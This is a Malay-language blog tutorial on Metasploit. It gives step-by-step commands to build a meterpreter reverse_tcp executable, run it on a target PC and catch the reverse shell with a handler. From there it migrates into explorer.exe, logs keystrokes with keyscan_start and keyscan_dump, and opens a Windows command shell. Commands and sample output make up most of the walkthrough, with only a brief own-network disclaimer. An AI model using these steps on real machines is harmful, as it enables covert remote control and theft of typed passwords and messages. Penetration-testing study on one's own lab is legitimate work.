Metasploit
adalah sumber terbuka rangka kerja(framework) untuk ujian penetrasi.
Ianya digunakan untuk mengembangkan dan melaksanakan serangan terhadap
sistem sasaran. Ia juga mempunyai pangkalan data yang besar dan boleh
juga digunakan utnuk menulis eksploitasi zero-day kita sendiri.
Di bawah ini saya senaraikan basic-basic term yang perlu anda tahu:
- Vulnerability: Kecacatan atau kelemahan
dalam prosedur sekuriti sistem, reka bentuk atau pelaksanaan yang boleh
dieksploitasikan sehingga menyebabkan kerosakkan.
- Exploit: Sejenis perisian yang
mengambil kesempatan terhadap bug atau vulnerability, yang boleh membawa
kepada privilege escalation atau serangan DOS terhadap sasaran.
- Overflow: Ralat yang disebabkan apabila
sesuatu program itu cuba untuk menyimpan data di luar saiznya. Mungkin
ianya digunakan untuk membolehkan penyerang untuk melaksanakan malicious
code.
- Payload: Kod sebenar yang dijalankan pada sistem yang dikompromi selepas eksploitasi.
Metasploit muncul dengan versi-versi berikut:
- CLI (Command Line Interface)
- Web Interface
- MSF Console
- MSFwx
- MSFAPI
Untuk tutorial hari ini saya menggunakan MSF console kerana ianya mudah dan efektif. Jadi apa yang anda perlukan adalah
Backtrack dan 2 komputer, iaitu satu tu untuk komputer anda dan satu lagi komputer sasaran.
Ingat! Anda lakukan ini di network anda sendiri. Okay. Are you ready? Lets GO!
Mula-mula sekali buka backtrack anda itu. Kalau tak tahu nak
pasang anda boleh godek-godek blog ni untuk cari cara pemasangannya. Apa
yang penting sekali anda perlu tahu Local IP anda. Anda buka terminal
dan taipkan
root@bt:~#ifconfig
Kemudian anda akan jumpa IP anda seperti 192.168.x.x atau 10.x.x.x
Pastikan anda
ingat IP anda itu.
Langkah seterusnya anda pergi ke
Applications >>
Backtrack >>
Exploitation Tools >>
Network Exploitation Tools >>
Metasploit Framework >>
msfconsole
Anda pasti akan mendapat shell yang sama seperti command prompt di dalam Windows.
Selepas itu anda membuka terminal dan taipkan perintah ini.
Tujuannya untuk mencipta satu fail pelaksanaan yang membolehkan
menghubungkan komputer kita dan komputer sasaran dengan menggunakan
meterprete payload.
root@bt:~# cd /opt/framework3/msf3
root@bt:/opt/framework3/msf3# ./msfpayload
windows/meterpreter/reverse_tcp LHOST="Local IP Anda" LPORT="Apa-apa
sahaja Port" x > /root/Desktop/reverse_tcp.exe
Local IP anda itu adalah IP anda sendiri. Yang saya suruh ingat
tadi. Kalau lupa tengok balik kat atas. Dan untuk port anda boleh pilih
4444. (Semua ini ditulis tanpa quotes.)
Anda akan mendapat seperti ini:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/framework3/msf3#
Juga di desktop anda akan ada fail reverse_tcp.exe.
Anda salin reverse_tcp.exe itu dan tampalkannya pada komputer
sasaran anda yang menggunakan local network yang sama. Kemudian
jalankannya.
Kemudian anda buka semula
msfconsole yang saya suruh buka tadi itu. Dan taipkan ini
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
Baiklah semua sudah siap. Anda telah pun membuat fail pelaksanaan yang mana ianya akan balik semula connections itu kepada anda.
Langkah terakhir adalah taipkan "exploit" dan tekan enter.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
Anda akan melihat meterpreter prompt seperti ni
meterpreter >
Taipkan "ps" untuk mendapatkan senarai proses yang aktif
meterpreter > ps
Kemudian cari perkataan "explorer.exe" dan pindahkannya ke proses.
Anda perlu lihat pada nombor di sebelah explorer.exe. Sebagai contoh
nombornya adalah 5716. Taipkan "migrate 5716"
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
Kemudian taipkan perintah ini pula
meterpreter > use priv
Jika anda mahu mulakan aktiviti keylogger, anda boleh taipkan ini
meterpreter > keyscan_start
Jika anda ingin pergi ke komputer sasaran anda itu. Anda boleh taipkan ini
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Anda boleh buat apa saja bila sudah masuk ke komputer sasaran. Dan jika nak kemabali ke meterpreter, anda taipkan perintah ini
C:\Windows\system32> exit
Jika anda ingin melihat apa yang telah di taip pada komputer sasaran, anda taipkan ini
meterpreter > keyscan_dump
Sudah siap! Itu sahaja tutorial yang dapat saya ajar. Kalau anda ada
tersalah langkah, ianya tidak akan menjadi. Saya telah mencubanya dua
kali dan ianya memang menjadi. HAHA. Jadi apa tunggu lagi? Godam la
komputer anda sendiri. :P
P.S.:
The above information is just for educational purposes only. You should test it against the computer you own.
Kalau nak bertanya, jangan la tanya soalan-soalan yang tidak munasabah.
Anda perlu buat dahulu, cuba buat sendiri. Jangan sebelum buat, dah
tanya macam-macam. Itu tandanya anda
MALAS.
Sekian Tutorial dari Tekno
Semoga bermanfaat